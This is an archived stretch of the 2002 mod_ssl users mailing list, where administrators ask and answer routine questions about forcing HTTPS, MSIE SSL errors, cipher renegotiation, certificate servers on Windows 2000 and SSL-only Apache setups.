~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 20:39:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA07154; Mon, 7 Jan 2002 20:38:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from zeus.eal.ab.ca id UAA07136; Mon, 7 Jan 2002 20:37:51 +0100 (MET) Received: by zeus.eal.ab.ca with Internet Mail Service (5.5.2650.21) id ; Mon, 7 Jan 2002 12:37:19 -0700 Message-ID: From: "Zhang, Li" To: "'modssl-users@modssl.org'" Subject: force to use SSL when accessing certain directory/url? Date: Mon, 7 Jan 2002 12:37:19 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Zhang, Li" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi mod-ssl guru: It is easy to do this in IIS but for Apache/mod_ssl how can I force the browser to use https when a user is trying to access a url via http? I'm using Apache 1.3.22 + mod_ssl. For example: the user is trying to access: http://myhost/secure/index.html The server forces to use https://myhost/secure/index.html /secure is pointing to c:/mysecureweb I appreciate if you can give me a sample config file. Thanks. Li ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 21:00:27 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA08148; Mon, 7 Jan 2002 20:59:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from chrome.verticalscope.com id UAA08135; Mon, 7 Jan 2002 20:59:03 +0100 (MET) Received: from jedi.verticalscope.com (dhcp116.office.verticalscope.com [10.10.10.116]) by chrome.verticalscope.com (Postfix) with ESMTP id B8D0BCCA6D for ; Mon, 7 Jan 2002 15:02:37 -0500 (EST) Received: by jedi.verticalscope.com (Postfix, from userid 533) id D56C719DB; Mon, 7 Jan 2002 14:58:55 -0500 (EST) Message-ID: X-Mailer: XFMail 1.5.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: X-Base: are belong to us. move zig for great justice. Date: Mon, 07 Jan 2002 14:58:55 -0500 (EST) X-Face: %*.F!K#`0&;M^0AiDH.>-twy^j2[V{11:%R@6A~sj26H$^}7B[ez9tB`&D'j-?}eX%;o|YO zn1jl&;})pyN.}i.gv~S>>u%=={3PJMI3.pcaQ0l#E.S0(xHJKhmW#]CMP}ue"&PsW=q&Tl8C&g)AT ;<9dD2"Z|$El To: modssl-users@modssl.org Subject: RE: force to use SSL when accessing certain directory/url? Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On 07-Jan-2002 Zhang, Li wrote: > the user is trying to access: http://myhost/secure/index.html > The server forces to use https://myhost/secure/index.html Can you just do Redirect /secure/ https://myhost/secure/ within the config for your nonsecure host? - Julian -- Julian C. Dunn, B.A.Sc. Senior Software Developer, VerticalScope Inc. 111 Peter St., Suite 700, Toronto, ON Tel: (416) 341-8950 x236 Fax: (416) 341-8959 istream >> ostream >> "We all scream for ice cream"; ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 23:07:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA14337; Mon, 7 Jan 2002 23:06:35 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from plmler3.mail.eds.com id XAA14298; Mon, 7 Jan 2002 23:05:42 +0100 (MET) Received: from plmlir4.mail.eds.com (plmlir4-2.mail.eds.com [199.228.143.135]) by plmler3.mail.eds.com (8.11.6/8.11.3) with ESMTP id g07M5eE27086 for ; Mon, 7 Jan 2002 16:05:40 -0600 Received: from plmlir4.mail.eds.com (localhost [127.0.0.1]) by plmlir4.mail.eds.com (8.11.6/8.11.3) with ESMTP id g07M5c529585 for ; Mon, 7 Jan 2002 16:05:39 -0600 (CST) Received: from usplm002.exch.eds.com (USPLM002.txpln.us.eds.com [198.132.135.7]) by plmlir4.mail.eds.com (8.11.6/8.11.3) with ESMTP id g07M5ci29566 for ; Mon, 7 Jan 2002 16:05:38 -0600 (CST) Received: by USPLM002.txpln.us.eds.com with Internet Mail Service (5.5.2655.51) id ; Mon, 7 Jan 2002 17:05:42 -0500 Message-ID: <8A87A19E6153D4119FA800508BDF0932E0E242@USHEM202> From: "Kuczborski, Carol L" To: "'modssl-users@modssl.org'" Subject: RE: Intermittent "Page cannot be displayed" and "Cannot find erro r or DNS error" using mod_ssl and IE 5.5 Date: Mon, 7 Jan 2002 17:05:31 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.51) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kuczborski, Carol L" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am replying to my own problem I posted several months ago to supply the resolution. I worked with Oracle on the problem since they package the Apache Web Server and mod_ssl was packaged with their Oracle9i Application Server. To resolve the intermittent "Page cannot be displayed" and "Cannot find error or DNS error" we received using mod_ssl and the Microsoft Internet Explorer (IE) browser, we applied the following solutions provided by Oracle for mod_ssl: * Implemented solution for Oracle Bug No. 1822053 (HTTP 404 Doing Portal Development) by changing (and un-commenting) the following line in our Apache http.conf file: * From: #SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown * To: SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown * Implemented solution for Oracle Bug No. 1821195 (When uploading large file using modplsql & SSL error reading data from client) by replacing the existing ApacheModuleSSL.dll file with the patched file referenced in the bug details. Applying the change to the http.conf file identified by Bug No. 1822053 (removing the nokeepalive entry) seems to have solved our problems with the intermittent occurrences of the noted error message on most all web pages in the application. We still occasionally get the error messages, but not as frequently as before. Before the configuration change we could not access the application for more than 2-3 minutes without receiving the error. Now we only get it a few times during the day. The second patch solved our problem with receiving the noted error message whenever we tried to add items to a content area using the Oracle9iAS Portal add-item-wizard. Prior to applying the patch we always received the noted error message each time we tried to access the add-item-wizard pages to upload a file to the server. According to the details for the ApacheModuleSSL.dll patch, there was mention of a bug in the "select" function in Windows NT 4.0: "When checking a socket, if data can be read without blocking, select () returns yes, but when actually reading from the socket with recv(), that function returns WSAEWOULDBLOCK, which says that reading would block. It seems that this problem does not occur in usual operation, but only in an SSL enabled Apache (modssl or apache-ssl) with https. The code for WIN32, which handles writing to a socket, already contains a workaround for this. The code for reading from a socket did not have a workaround." Carol Kuczborski EDS - Enabling Business Solutions MS A6N-B47 13600 EDS Drive Herndon, VA 20171 * phone: +01-703-742-1025 (8-432) * mailto:carol.kuczborski@eds.com www.eds.com > -----Original Message----- > From: Kuczborski, Carol L > Sent: Monday, August 06, 2001 1:54 PM > To: 'modssl-users@modssl.org' > Subject: Intermittent "Page cannot be displayed" and "Cannot find > error or DNS error" using mod_ssl and IE 5.5 > > Anyone know about the following issue or steps towards resolving: > > Background: > > Implemented SSL using mod_ssl with the Apache HTTP Server and self-signed > certificates. > Server environment: Windows NT Server 4.0, Apache HTTP Server, Oracle > 9iAS, Oracle 9iAS Portal, port 443 > Client environment: Microsoft Internet Explorer (IE) 5.50, 128 bit > encryption > > Problem: > > When accessing our Portal website using the IE browser, we get the > following intermittent messages: > > "The page cannot be displayed" and "Cannot find server or DNS error". > > We know it has noting to do with a DNS error, because the pages can be > accessed using the Netscape browser. Sometimes the page can be accessed > by the IE browser, and at other times we get the error. Occasionally a > reload, refresh, or back and forward, will return the page, and at other > times we get the error. Everything works fine using the Netscape 4.75 > browser, we never et the error. We think it is the problem noted on the > FAQ page about " Why do I get I/O errors with MSIE clients" and made the > recommended change, but it did not work. > > Any suggestions would be appreciated. We must use SSL and IE. > > Carol Kuczborski > EDS - Enabling Business Solutions > MS A6N-B47 > 13600 EDS Drive > Herndon, VA 20171 > > * phone: +01-703-742-1025 (8-432) > * mailto:carol.kuczborski@eds.com > www.eds.com > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 8 02:04:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id CAA23705; Tue, 8 Jan 2002 02:03:41 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from scn4.scn.org id CAA23668; Tue, 8 Jan 2002 02:02:49 +0100 (MET) Received: from scn.org (jj@scn [209.63.95.146]) by scn4.scn.org (8.9.1/8.9.1) with ESMTP id QAA19483 for ; Mon, 7 Jan 2002 16:57:57 -0800 (PST) Received: from localhost (jj@localhost) by scn.org (8.9.1/8.9.1) with SMTP id RAA23306 for ; Mon, 7 Jan 2002 17:04:49 -0800 (PST) Date: Mon, 7 Jan 2002 17:04:45 -0800 (PST) From: "J. Johnson" X-Sender: jj@scn To: modssl-users@modssl.org Subject: Re: Using https and http at the same time In-Reply-To: <001a01c19473$f80324b0$5c0010ac@gardnerbender.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "J. Johnson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Perhaps someone could explain just why one would login with http, exposing one's password to whomever's watching, and _then_ switch to https? === JJ ============================================================= On Thu, 3 Jan 2002, Waleed Hamad wrote: > > Hi Is it possible to run http and https at the same time?? > > I mean, You know how hotmail.com works?? you login at http and then you > have the choice to be secure and use https?? > > Please let me know > > Waleed > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 8 02:12:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id CAA24345; Tue, 8 Jan 2002 02:11:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from atlrel6.hp.com id CAA24257; Tue, 8 Jan 2002 02:10:56 +0100 (MET) Received: from xatlrelay2.atl.hp.com (xatlrelay2.atl.hp.com [15.45.89.191]) by atlrel6.hp.com (Postfix) with ESMTP id BDD396004AD for ; Mon, 7 Jan 2002 20:10:46 -0500 (EST) Received: from xatlbh3.atl.hp.com (xatlbh3.atl.hp.com [15.45.89.188]) by xatlrelay2.atl.hp.com (Postfix) with ESMTP id 7D6ED4000BE for ; Mon, 7 Jan 2002 20:10:46 -0500 (EST) Received: by xatlbh3.atl.hp.com with Internet Mail Service (5.5.2653.19) id ; Mon, 7 Jan 2002 20:10:46 -0500 Message-ID: From: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" To: "'modssl-users@modssl.org'" Subject: Connection re-negotiation Date: Mon, 7 Jan 2002 20:10:37 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi mod_ssl gurus, I had a small question regarding connection re-negotiation : The scenario is that I have a 56-bit browser (IE 6.0) and a 128/168 bit enabled apache (+mod_ssl 2.8.4) server.. During a https transaction, the browser establishes 56-bit connection, but then inorder to access a particular location, a 128 bit connection is mandated by the server (using the SSLRequire option).. Is it possible that the client can upgrade the connection to a 128-bit one ??.. If yes, how to achieve that ?.. -Madhu ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 8 03:59:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA28935; Tue, 8 Jan 2002 03:58:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from statler.squaretrade.com id DAA28917; Tue, 8 Jan 2002 03:58:01 +0100 (MET) Received: from [216.136.185.66] (helo=gonzo) by statler.squaretrade.com with smtp (Exim 3.33 #1 (Debian)) id 16NmFV-0006gN-00 for ; Mon, 07 Jan 2002 18:44:25 -0800 From: "Glen S Mehn" To: Subject: RE: mod_ssl, apache, cgi-bin, IE 5.5, & Mailman Date: Mon, 7 Jan 2002 18:58:26 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal In-Reply-To: <5.1.0.14.2.20020106224534.02ac1060@linux.midrange.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Glen S Mehn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi David: There's a FAQ on the mod_ssl site about IE and it's problems implementing the protocol properly. The short answer is to add: SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 SetEnv nokeepalive SetEnv ssl-unclean-shutdown SetEnv downgrade-1.0 in your :443 VirtualHost section. The longer, and worth-a-read answer is in the FAQ. glen -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]On Behalf Of David Gibbs Sent: Sunday, January 06, 2002 08:48 PM To: modssl-users@modssl.org Subject: Re: mod_ssl, apache, cgi-bin, IE 5.5, & Mailman At 11:43 PM 1/6/2002 -0500, you wrote: >First, I didn't think folks on this list required spoonfeeding. Folks: Mailman isn't really the issue ... I am running 2.0.8, but I think the problem lies with IE & mod_ssl ... as Netscape works fine. I've checked the FAQ's and done the requisite Google searches ... I couldn't find anything significant. Is there any debugging flags that I can turn on to get more information, perhaps I have something configured wrong. Maybe something has to be added to allow IE data to be accepted. Thanks! david ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 8 12:04:29 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA22021; Tue, 8 Jan 2002 12:03:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from serv01.aet.tu-cottbus.de id MAA21982; Tue, 8 Jan 2002 12:02:34 +0100 (MET) Received: from localhost (localhost [127.0.0.1]) by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 8D26B3725 for ; Tue, 8 Jan 2002 12:02:27 +0100 (MET) Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019) id 5C9AB36B3; Tue, 8 Jan 2002 12:02:24 +0100 (MET) Date: Tue, 8 Jan 2002 12:02:24 +0100 From: Lutz Jaenicke To: "'modssl-users@modssl.org'" Subject: Re: Connection re-negotiation Message-ID: <20020108110224.GA29869@serv01.aet.tu-cottbus.de> Mail-Followup-To: "'modssl-users@modssl.org'" References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.25i Organization: BTU Cottbus, Allgemeine Elektrotechnik X-Virus-Scanned: by AMaViS snapshot-20011031 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Lutz Jaenicke X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Jan 07, 2002 at 08:10:37PM -0500, MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1) wrote: > Hi mod_ssl gurus, > I had a small question regarding connection re-negotiation : > > The scenario is that I have a 56-bit browser (IE 6.0) and a 128/168 bit > enabled apache (+mod_ssl 2.8.4) server.. During a https transaction, the > browser > establishes 56-bit connection, but then inorder to access a particular > location, a 128 bit connection is mandated by the server (using the > SSLRequire option).. Is it possible that the client can upgrade the > connection to a 128-bit one ??.. If yes, how to achieve that ?.. If your browser only supports export ciphers, there is nothing the server can do with respect to a particular location. However: if you can get hold of a special certificate, you can enable full strength encryption with a special certificate (search for "server gated cryptography"). BTW: for netscape new versions are all shipped with full strength encryption. Isn't the same available for IE? Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke@aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 8 12:20:24 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA24246; Tue, 8 Jan 2002 12:19:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from tpau.muc.eurocyber.net id MAA24203; Tue, 8 Jan 2002 12:18:37 +0100 (MET) Received: from netpkws (www.pnetlinks.com [195.143.212.91]) by tpau.muc.eurocyber.net (8.11.3/8.11.3/tpau-1.0) with SMTP id g08BIXB61648 for ; Tue, 8 Jan 2002 12:18:33 +0100 (CET) From: "Dr. Peter Kanyion" To: Subject: CA-Server on Win200 Date: Tue, 8 Jan 2002 12:15:47 +0100 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20020108110224.GA29869@serv01.aet.tu-cottbus.de> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Dr. Peter Kanyion" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I need to put up a CA Server on Win2000 for testing purposes. Any recommendation for software will be highly appreciated. Sorry, if this request is out of scope. Thanks. Peter ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 8 12:39:36 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA25025; Tue, 8 Jan 2002 12:38:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from anchor-post-31.mail.demon.net id MAA24986; Tue, 8 Jan 2002 12:37:21 +0100 (MET) Received: from valleyhouse.demon.co.uk ([194.222.197.55] helo=hades) by anchor-post-31.mail.demon.net with smtp (Exim 2.12 #1) id 16NuZE-000JlE-0V for modssl-users@modssl.org; Tue, 8 Jan 2002 11:37:20 +0000 Message-ID: <001e01c19839$439683e0$642da8c0@hades> From: "madhon" To: References: Subject: Re: CA-Server on Win200 Date: Tue, 8 Jan 2002 11:40:25 -0000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "madhon" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users if you have win2000 server/advanced server you can install certificate servers to do it ----- Original Message ----- From: "Dr. Peter Kanyion" To: Sent: Tuesday, January 08, 2002 11:15 AM Subject: CA-Server on Win200 Hi, I need to put up a CA Server on Win2000 for testing purposes. Any recommendation for software will be highly appreciated. Sorry, if this request is out of scope. Thanks. Peter ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 8 12:49:23 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA25434; Tue, 8 Jan 2002 12:48:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from tpau.muc.eurocyber.net id MAA25410; Tue, 8 Jan 2002 12:47:36 +0100 (MET) Received: from netpkws (www.pnetlinks.com [195.143.212.91]) by tpau.muc.eurocyber.net (8.11.3/8.11.3/tpau-1.0) with SMTP id g08BlaB74430 for ; Tue, 8 Jan 2002 12:47:36 +0100 (CET) From: "Dr. Peter Kanyion" To: Subject: RE: CA-Server on Win200 Date: Tue, 8 Jan 2002 12:44:50 +0100 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <001e01c19839$439683e0$642da8c0@hades> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Dr. Peter Kanyion" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks for the swift response. No,I don't have the advanced server version of Win2000. If I correctly understood your comments, the certificate server is included in the advanced server, right? If that is the case, I'll strive to get the Win2000 advanced server version. Thanks. Peter -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]On Behalf Of madhon Sent: Dienstag, 8. Januar 2002 12:40 To: modssl-users@modssl.org Subject: Re: CA-Server on Win200 if you have win2000 server/advanced server you can install certificate servers to do it ----- Original Message ----- From: "Dr. Peter Kanyion" To: Sent: Tuesday, January 08, 2002 11:15 AM Subject: CA-Server on Win200 Hi, I need to put up a CA Server on Win2000 for testing purposes. Any recommendation for software will be highly appreciated. Sorry, if this request is out of scope. Thanks. Peter ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 8 13:18:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA26974; Tue, 8 Jan 2002 13:17:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from finch-post-11.mail.demon.net id NAA26965; Tue, 8 Jan 2002 13:16:54 +0100 (MET) Received: from valleyhouse.demon.co.uk ([194.222.197.55] helo=hades) by finch-post-11.mail.demon.net with smtp (Exim 2.12 #1) id 16NvBV-000Bth-0B for modssl-users@modssl.org; Tue, 8 Jan 2002 12:16:53 +0000 Message-ID: <000701c1983e$ca039030$642da8c0@hades> From: "madhon" To: References: Subject: Re: CA-Server on Win200 Date: Tue, 8 Jan 2002 12:19:58 -0000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "madhon" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users its included in both the server and advanced server versions of win200 ----- Original Message ----- From: "Dr. Peter Kanyion" To: Sent: Tuesday, January 08, 2002 11:44 AM Subject: RE: CA-Server on Win200 Thanks for the swift response. No,I don't have the advanced server version of Win2000. If I correctly understood your comments, the certificate server is included in the advanced server, right? If that is the case, I'll strive to get the Win2000 advanced server version. Thanks. Peter -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]On Behalf Of madhon Sent: Dienstag, 8. Januar 2002 12:40 To: modssl-users@modssl.org Subject: Re: CA-Server on Win200 if you have win2000 server/advanced server you can install certificate servers to do it ----- Original Message ----- From: "Dr. Peter Kanyion" To: Sent: Tuesday, January 08, 2002 11:15 AM Subject: CA-Server on Win200 Hi, I need to put up a CA Server on Win2000 for testing purposes. Any recommendation for software will be highly appreciated. Sorry, if this request is out of scope. Thanks. Peter ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 10 10:30:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA07762; Thu, 10 Jan 2002 10:29:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id KAA07736; Thu, 10 Jan 2002 10:28:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id UAA07595; Mon, 7 Jan 2002 20:47:09 +0100 (MET) Date: Mon, 7 Jan 2002 20:47:09 +0100 (MET) Message-Id: <200201071947.UAA07595@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] Openssl+modssl+Apache (PR#519) CC: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, Got into the similar situation with Solaris and the error went away when I removed the binutils package . The package binutils installs ranlib which has become obsalate with SunOS5.X The utility (ar) will do this automatically. (Make sure you have /usr/ccs/bin in your path though ..) But as I said , in my case the O.S was Solaris and I dont know what to do in case of Rad Hat . This might give you some clue on what the problem is.. Good luck ! Harish ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 10 10:30:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA07769; Thu, 10 Jan 2002 10:29:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id KAA07733; Thu, 10 Jan 2002 10:28:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web13201.mail.yahoo.com id UAA07295; Mon, 7 Jan 2002 20:41:04 +0100 (MET) Message-ID: <20020107194103.7835.qmail@web13201.mail.yahoo.com> Received: from [141.202.246.11] by web13201.mail.yahoo.com via HTTP; Mon, 07 Jan 2002 11:41:03 PST Date: Mon, 7 Jan 2002 11:41:03 -0800 (PST) From: Jeff Nordan Subject: Enable HTTPS but Disable HTTP To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jeff Nordan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I was wondering if it is possible to have a server with SSL only? Here is my setup: Apache 1.3.22 for Win32 (under Win2k) OpenSSL 0.9.6c mod_ssl 2.8.5-1.3.22 What is needed in either the install of the software or the configuration of the .conf files to get this setup to work? Or is it even possible? Thanks, Jeff __________________________________________________ Do You Yahoo!? Send FREE video emails in Yahoo! Mail! http://promo.yahoo.com/videomail/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 10 10:30:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA07774; Thu, 10 Jan 2002 10:29:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id KAA07752; Thu, 10 Jan 2002 10:28:35 +0100 (MET) Received: by 